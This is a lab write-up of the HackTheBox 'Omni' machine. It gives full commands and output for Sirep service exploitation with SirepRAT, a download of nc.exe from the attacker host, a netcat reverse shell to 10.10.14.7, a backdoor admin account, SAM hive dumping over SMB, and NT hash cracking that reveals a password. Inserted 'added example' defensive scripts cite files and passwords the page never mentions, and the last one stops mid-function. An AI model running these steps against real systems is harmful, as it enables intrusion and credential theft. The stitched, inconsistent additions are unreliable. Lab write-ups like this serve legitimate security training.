Omni

From Luniwiki

Omni01.png


Port scan

u505@naos:~/HTB/Machines/Omni$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.204

Starting masscan 1.0.5 at 2021-01-12 12:56:04 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 29819/tcp on 10.10.10.204
Discovered open port 8080/tcp on 10.10.10.204
Discovered open port 135/tcp on 10.10.10.204
Discovered open port 29817/tcp on 10.10.10.204
Discovered open port 29820/tcp on 10.10.10.204
Discovered open port 5985/tcp on 10.10.10.204

The operating system seems to be Windows.

u505@naos:~/HTB/Machines/Omni$ sudo nmap -sC -sV -O omni
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 07:58 EST
Nmap scan report for omni (10.10.10.204)
Host is up (0.037s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE VERSION
135/tcp  open  msrpc   Microsoft Windows RPC
8080/tcp open  upnp    Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|2008 (87%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2
Aggressive OS guesses: Microsoft Windows XP SP3 (87%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.14 seconds
u505@naos:~/HTB/Machines/Omni$ cat ports | cut -d ' ' -f 4 | cut -d '/' -f 1 | sort -n | while read port; do printf $port","; done
135,5985,8080,29817,29819,29820,

Port 8080 is not accessible without authorization, and there are two strange ports, 29819 and 29820.

u505@naos:~/HTB/Machines/Omni$ sudo nmap -sC -sV -O -p 135,5985,8080,29817,29819,29820 omni
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-12 08:00 EST
Nmap scan report for omni (10.10.10.204)
Host is up (0.037s latency).

PORT      STATE SERVICE  VERSION
135/tcp   open  msrpc    Microsoft Windows RPC
5985/tcp  open  upnp     Microsoft IIS httpd
8080/tcp  open  upnp     Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open  unknown
29819/tcp open  arcserve ARCserve Discovery
29820/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.91%I=7%D=1/12%Time=5FFD9D83%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (89%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.37 seconds
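The port 29820 fingerprint above is worth keeping: every probe nmap sent (NULL, GenericLines, Help, JavaRMI) got the same 16 bytes back, which is the kind of fixed banner an asset inventory or IDS signature can key on. The following parser is an added example, not part of the original write-up: it reads an nmap SF fingerprint block (the exact text printed above), joins the SF: continuation lines, decodes the escaped response data for each probe, checks the recorded lengths, and reports whether the service answers with a probe-independent banner. Only the fingerprint text comes from the page; the function names and structure are assumptions.

```python
"""Parse an nmap service fingerprint (the SF-Port... block) into probe -> response bytes.

Added example for this write-up, not part of it. The FINGERPRINT text is the one
nmap printed for port 29820 above; everything else here is assumed.
"""
import re
from datetime import datetime, timezone
from typing import Optional

FINGERPRINT = r'''SF-Port29820-TCP:V=7.91%I=7%D=1/12%Time=5FFD9D83%P=x86_64-pc-linux-gnu%r(N
SF:ULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x0
SF:4G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\x
SF:c9}\xc8O\x12");'''

_HEADER = re.compile(r"SF-Port(\d+)-(\w+):V=([^%]+)%I=\d+%D=[^%]+%Time=([0-9A-Fa-f]+)%P=")
# One %r(probe,hexlen,"data") entry; "data" may contain backslash-escaped quotes.
_RESPONSE = re.compile(r'%r\((\w+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
_SIMPLE_ESCAPES = {"n": b"\n", "r": b"\r", "t": b"\t", "0": b"\x00"}


def unescape(data: str) -> bytes:
    """Decode nmap's escaping: \\xHH for non-printables, a backslash before special punctuation."""
    out = bytearray()
    i = 0
    while i < len(data):
        ch = data[i]
        if ch != "\\":
            out += ch.encode("latin-1")
            i += 1
        elif data[i + 1] == "x":
            out.append(int(data[i + 2:i + 4], 16))
            i += 4
        elif data[i + 1] in _SIMPLE_ESCAPES:
            out += _SIMPLE_ESCAPES[data[i + 1]]
            i += 2
        else:  # \\ \" \* \( \) \% ... stand for the literal character
            out += data[i + 1].encode("latin-1")
            i += 2
    return bytes(out)


def parse_fingerprint(text: str) -> dict:
    """Join the SF: continuation lines and return port, protocol, scan time and responses."""
    lines = text.strip().splitlines()
    joined = lines[0].strip() + "".join(
        ln.strip()[3:] for ln in lines[1:] if ln.strip().startswith("SF:"))
    m = _HEADER.match(joined)
    if not m:
        raise ValueError("not an nmap SF fingerprint")
    port, proto, version, epoch_hex = m.groups()
    responses = {}
    for probe, hexlen, data in _RESPONSE.findall(joined):
        raw = unescape(data)
        if len(raw) != int(hexlen, 16):  # nmap records the response length in hex
            raise ValueError(f"length mismatch for probe {probe}")
        responses[probe] = raw
    return {
        "port": int(port),
        "proto": proto,
        "nmap_version": version,
        "time": datetime.fromtimestamp(int(epoch_hex, 16), tz=timezone.utc),
        "responses": responses,
    }


def static_banner(fp: dict) -> Optional[bytes]:
    """Return the reply if every probe got the same bytes back, else None.

    A reply that does not depend on the probe is a fixed banner: good material for an
    inventory rule or IDS signature, and a hint that the service ignores its input."""
    replies = list(fp["responses"].values())
    if replies and all(r == replies[0] for r in replies):
        return replies[0]
    return None


if __name__ == "__main__":
    fp = parse_fingerprint(FINGERPRINT)
    print(f"{fp['proto']}/{fp['port']} scanned {fp['time']:%Y-%m-%d %H:%M:%S} UTC by nmap {fp['nmap_version']}")
    for probe, raw in fp["responses"].items():
        print(f"  {probe:<13} {len(raw):2d} bytes  {raw.hex()}")
    banner = static_banner(fp)
    print("fixed banner:", banner.hex() if banner else "none (replies vary by probe)")
```

The hex Time field in the header is a Unix timestamp, so the parser also recovers when the fingerprint was taken (here 13:00:51 UTC on 12 January 2021, matching the 08:00 EST scan above).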

Port 8080

Omni02.png

No access without a username and password.

Enumerate ports 29817, 29819 and 29820

These ports are Windows IoT services: 29817 is WPCon, 29819 is WPConTCPPing / WPPingSirep, and 29820 is WPConProtocol2.

u505@naos:~/HTB/Machines/Omni$ telnet omni 29819
Trying 10.10.10.204...
Connected to omni.
Escape character is '^]'.
PING

These ports belong to Windows IoT Core. This long presentation details the Sirep protocol and releases a tool that gives remote access to the device.

Omni03.png

SirepRAT tool

After cloning the SirepRAT git repository, check the help output to get familiar with the tool.

u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py -h
usage: SirepRAT.py target_device_ip command_type [options]

Exploit Windows IoT Core's Sirep service to execute remote commands on the device
positional arguments:
  target_device_ip      The IP address of the target IoT Core device
  command_type          The Sirep command to use. Available commands are listed below

optional arguments:
  -h, --help            show this help message and exit
  --return_output       Set to have the target device return the command output stream
  --cmd CMD             Program path to execute
  --as_logged_on_user   Set to impersonate currently logged on user on the target device
  --args ARGS           Arguments string for the program
  --base_directory BASE_DIRECTORY
                        The working directory from which to run the desired program
  --remote_path REMOTE_PATH
                        Path on target device
  --data DATA           Data string to write to file
  --v                   Verbose - if printable, print result
  --vv                  Very verbose - print socket buffers and more

available commands:
  * LaunchCommandWithOutput
  * PutFileOnDevice
  * GetFileFromDevice
  * GetFileInformationFromDevice
  * GetSystemInformationFromDevice

remarks:
  - Use moustaches to wrap remote environment variables to expand (e.g. {{userprofile}})

Usage example: python SirepRAT.py 192.168.3.17 GetFileFromDevice --remote_path C:\Windows\System32\hostname.exe
u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>

Upload data to a file.

u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 PutFileOnDevice --remote_path 'C:\Windows\Temp\uploadtest.txt' --data 'Hello u505'
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

Check the information of the uploaded file.

u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 GetFileInformationFromDevice --remote_path 'C:\Windows\Temp\uploadtest.txt'
<FileInformationResult | type: 61, payload length: 40, kv: {'dwFileAttributes': 32, 'file_size': 65536, 'time_created': '2441-01-24 18:48:06.203150', 'time_last_access': '2441-01-24 18:48:06.203150', 'time_last_write': '2441-01-24 18:48:06.203150', 'HResult': '0x0'}>

Retrieve the content of the file created above.

u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 GetFileFromDevice  --remote_path 'C:\Windows\Temp\uploadtest.txt' --v
---------
---------
---------
Hello u505
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 13562, payload peek: 'b'H\x00e\x00l\x00l\x00o\x00 \x00u\x005\x000\x005\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00>

Upload nc.exe

Start a web server and copy the nc.exe executable into its directory.

u505@naos:~/HTB/Machines/Omni$ mkdir web
u505@naos:~/HTB/Machines/Omni$ cd web/
u505@naos:~/HTB/Machines/Omni/web$ cp /opt/utils/nc.exe/nc64.exe ./
u505@naos:~/HTB/Machines/Omni/web$ sudo python -m SimpleHTTPServer 80           
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

Download nc.exe onto the target machine.

u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --as_logged_on_user --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -Uri http://10.10.14.7/nc64.exe -OutFile C:\Windows\Temp\nc.exe' --v
---------
---------
---------
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<ErrorStreamResult | type: 12, payload length: 4, payload peek: 'b'\x00\x00\x00\x00>

Obtain a reverse shell

u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444

Execute nc remotely.

u505@naos:~/HTB/Machines/Omni$ python3 /opt/utils/SirepRAT/SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c C:\Windows\Temp\nc.exe 10.10.14.7 4444 -e cmd ' --v
---------
---------
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

The reverse shell opens.

u505@naos:~/HTB/Machines/Omni$ rlwrap nc -lnvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.204.
Ncat: Connection from 10.10.10.204:49670.
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.

C:\windows\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\windows\system32>echo %username%
echo %username%
omni$

The whoami command doesn't exist in Windows IoT Core. The %username% variable expands to omni$, the machine account, so we have a SYSTEM shell.

User and root flags

I found the user and root flags, but each "flag" is stored as a PowerShell credential (Export-CliXml) encrypted with the owning user's DPAPI key. :( To decrypt them we need to log in as the user app (or administrator).

c:\Data\Users\app>type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>
C:\Data\Users\administrator>type root.txt
type root.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">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</SS>
    </Props>
  </Obj>
</Objs>

Add user

First reflex: change the administrator password.

c:\Data\Users\app>net user administrator u505
net user administrator u505
The command completed successfully.

But when I tried to access the web console the access was denied.

Omni10.png

We add a new user.

c:\Data\Users\app>net user u505 u505 /add
net user u505 u505 /add
The command completed successfully.

Try to add the new user to the administrators group.

c:\Data\Users\app>net localgroup administrators /add u505 & net localgroup administrators
net localgroup administrators /add u505 & net localgroup administrators
The command completed successfully.

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
u505
The command completed successfully.

The user was successfully added, but after a few seconds our user is removed from the administrators group.

c:\Data\Users\app>net localgroup administrators
net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members
-------------------------------------------------------------------------------
Administrator
The command completed successfully.

With the user u505 we can access the web console, but only as a low-privileged user.

Omni04.png

Omni05.png

It seems that a background process resets the administrator password and removes extra users from the administrators group.
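A defender watching for exactly this kind of change would diff the group membership against an approved baseline rather than rely on a password reset. The following script is an added example and not part of the write-up: it parses the two net localgroup administrators outputs shown above (constructed here as strings) and reports members added to or missing from an assumed baseline set.

```python
"""Detect drift in local Administrators membership from `net localgroup` output.

Added example, not part of the write-up. BEFORE and AFTER are constructed from the
two command outputs shown above; BASELINE is an assumed approved member set.
"""
import re

BEFORE = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
u505
The command completed successfully.
"""

AFTER = """\
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
"""

BASELINE = {"administrator"}  # assumed: the only account that should hold local admin


def parse_members(output: str) -> set:
    """Collect the member names listed after the dashed separator (case-insensitive)."""
    members, in_list = set(), False
    for line in output.splitlines():
        text = line.strip()
        if not in_list:
            in_list = text.startswith("----")
            continue
        if not text or text.startswith("The command completed"):
            break
        # net.exe prints several names per line in fixed-width columns when the group
        # is large; columns are separated by runs of spaces, names may contain one space.
        members.update(name.lower() for name in re.split(r"\s{2,}", text) if name)
    return members


def drift(output: str, baseline=BASELINE) -> dict:
    """Members outside the baseline (added) and baseline members that are missing (removed)."""
    members = parse_members(output)
    return {"added": sorted(members - baseline), "removed": sorted(baseline - members)}


if __name__ == "__main__":
    for label, capture in (("before cleanup", BEFORE), ("after cleanup", AFTER)):
        print(label, drift(capture))
```

Run periodically (or triggered by event 4732, "A member was added to a security-enabled local group"), the same comparison gives an alert at the moment the unexpected member appears instead of silently undoing it.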

Dump SAM

The SYSTEM user has the privileges needed to dump the SAM.

C:\Windows\Temp>reg save HKLM\sam sam
reg save HKLM\sam sam
The operation completed successfully.

C:\Windows\Temp>reg save HKLM\security security
reg save HKLM\security security
The operation completed successfully.

C:\Windows\Temp>reg save HKLM\system system
reg save HKLM\system system
The operation completed successfully.

Download the SAM files

To download the SAM files, we create an SMB share on our machine with Impacket's smbserver.py.

u505@naos:~/HTB/Machines/Omni/web$ sudo python3 /opt/utils/impacket/examples/smbserver.py -username u505 -password u505 netshare ./ -smb2support
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Map the network share to the X: drive letter.

C:\Windows\Temp>net use x: \\10.10.14.7\netshare /USER:u505 u505
net use x: \\10.10.14.7\netshare /USER:u505 u505
The command completed successfully.

Copy the SAM files to the network share.

C:\Windows\Temp>copy sam  X:\
copy sam  X:\
        1 file(s) copied.
		
C:\Windows\Temp>copy security  X:\
copy security  X:\
        1 file(s) copied.
		
C:\Windows\Temp>copy system  X:\
copy system  X:\
        1 file(s) copied.

Change the owner of the files on our box.

u505@naos:~/HTB/Machines/Omni/web$ sudo chown u505:u505 sam security system
[sudo] password for u505:

Dump hashes

u505@naos:~/HTB/Machines/Omni/web$ python3 /opt/utils/impacket/examples/secretsdump.py -sam sam -security security -system system LOCAL
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
u505:1004:aad3b435b51404eeaad3b435b51404ee:a770bbce91ca05c1b7d3b8b13102cd6d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DPAPI_SYSTEM
dpapi_machinekey:0xdc2beb4869328393b57ea9a28aeff84932c3e3ef
dpapi_userkey:0x6760a0b981e854b66007b33962764d5043f3d013
[*] NL$KM
 0000   14 07 22 73 99 42 B0 ED  F5 11 9A 60 FD A1 10 EF   .."s.B.....`....
 0010   DF 19 3C 6C 22 F2 92 0C  34 B1 6D 78 CC A7 0D 14   ..<l"...4.mx....
 0020   02 7B 81 04 1E F6 1C 66  69 75 69 84 A7 31 53 26   .{.....fiui..1S&
 0030   A3 6B A9 C9 BF 18 A8 EF  10 36 DB C2 CC 27 73 3D   .k.......6...'s=
NL$KM:140722739942b0edf5119a60fda110efdf193c6c22f2920c34b16d78cca70d14027b81041ef61c6669756984a7315326a36ba9c9bf18a8ef1036dbc2cc27733d
[*] Cleaning up...

Search for the hashcat mode.

u505@naos:~/HTB/Machines/Omni/web$ hashcat --example-hashes | grep -A 2 -B 1 NTLM
MODE: 1000
TYPE: NTLM
HASH: b4b9b02e6f09a9bd760f388b67351e2b
PASS: hashcat
--
MODE: 5500
TYPE: NetNTLMv1 / NetNTLMv1+ESS
HASH: ::5V4T:ada06359242920a500000000000000000000000000000000:0556d5297b5daa70eaffde82ef99293a3f3bb59b7c9704ea:9c23f6c094853920
PASS: hashcat
--
MODE: 5600
TYPE: NetNTLMv2
HASH: 0UL5G37JOI0SX::6VB1IS0KA74:ebe1afa18b7fbfa6:aab8bf8675658dd2a939458a1077ba08:010100000000000031c8aa092510945398b9f7b7dde1a9fb00000000f7876f2b04b700
PASS: hashcat

Create the hash file.

u505@naos:~/HTB/Machines/Omni$ cat samhashes
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
u505:1004:aad3b435b51404eeaad3b435b51404ee:a770bbce91ca05c1b7d3b8b13102cd6d:::

Try to crack them with a dictionary attack.

u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.1.1) starting...
...

31d6cfe0d16ae931b73c59d7e0c089c0:
e3cb0651718ee9b4faffe19a51faff95:mesh5143
Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: samhashes
Time.Started.....: Tue Jan 12 13:46:50 2021 (2 secs)
Time.Estimated...: Tue Jan 12 13:46:52 2021 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  7903.4 kH/s (5.72ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 2/7 (28.57%) Digests
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[303334323137383439] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 40c Util: 47% Core:1032MHz Mem:2505MHz Bus:16

Started: Tue Jan 12 13:46:48 2021
Stopped: Tue Jan 12 13:46:53 2021

Hashcat cracks two hashes.

u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
e3cb0651718ee9b4faffe19a51faff95:mesh5143

Second run of hashcat with the best64 rule set.

u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
hashcat (v6.1.1) starting...
...
INFO: Removed 2 hashes found in potfile.

Host memory required for this attack: 151 MB

Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1104517568

a770bbce91ca05c1b7d3b8b13102cd6d:u505

Cracking performance lower than expected? ...

Session..........: hashcat
Status...........: Exhausted
Hash.Name........: NTLM
Hash.Target......: samhashes
Time.Started.....: Tue Jan 12 13:48:11 2021 (10 secs)
Time.Estimated...: Tue Jan 12 13:48:21 2021 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   119.1 MH/s (13.20ms) @ Accel:256 Loops:38 Thr:64 Vec:1
Recovered........: 3/7 (42.86%) Digests
Progress.........: 1104517568/1104517568 (100.00%)
Rejected.........: 0/1104517568 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:76-77 Iteration:0-38
Candidates.#1....: $HEX[236823682368] -> $HEX[04a156616d6f]
Hardware.Mon.#1..: Temp: 47c Util: 84% Core:1202MHz Mem:2505MHz Bus:16

Started: Tue Jan 12 13:48:11 2021
Stopped: Tue Jan 12 13:48:21 2021

It finds my password.

u505@naos:~/HTB/Machines/Omni$ hashcat -m 1000 samhashes /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
31d6cfe0d16ae931b73c59d7e0c089c0:
e3cb0651718ee9b4faffe19a51faff95:mesh5143
a770bbce91ca05c1b7d3b8b13102cd6d:u505

The password mesh5143 corresponds to the user app.

u505@naos:~/HTB/Machines/Omni$ grep e3cb0651718ee9b4faffe19a51faff95 samhashes
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::

The password of the user app is mesh5143.
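The dump above can also be checked without a cracking rig for the policy failures that matter most to a defender: blank passwords, the same password on several accounts (NT hashes are unsalted, so equal passwords give equal hashes) and passwords from a short banned list. The following script is an added example, not part of the write-up: it implements MD4 in pure Python (OpenSSL 3 builds of hashlib usually refuse MD4, which is the core of the NT hash), parses the secretsdump output printed above and reports those failures per account. The banned list is an assumption built from passwords this page itself names (the old default "p@ssw0rd" from hardening.txt, mesh5143 and u505).

```python
"""Audit a secretsdump-style SAM dump for blank, reused and banned passwords.

Added example, not part of the write-up. MD4 is implemented here because hashlib on
OpenSSL 3 systems usually refuses it, and MD4 over UTF-16LE is exactly the NT hash.
SAM_DUMP is the output printed above; BANNED is an assumption built from passwords
this page mentions.
"""
import struct
from collections import defaultdict

SAM_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
u505:1004:aad3b435b51404eeaad3b435b51404ee:a770bbce91ca05c1b7d3b8b13102cd6d:::
"""

BANNED = ["", "p@ssw0rd", "mesh5143", "u505"]        # assumed banned list for this audit
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"       # LM hash of "" / LM storage disabled
MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320: little-endian words, three rounds of 16 steps."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles so the next step updates the next word
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); unsalted, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()


def parse_dump(text: str) -> dict:
    """user -> (rid, lm_hash, nt_hash) from pwdump-format lines."""
    accounts = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
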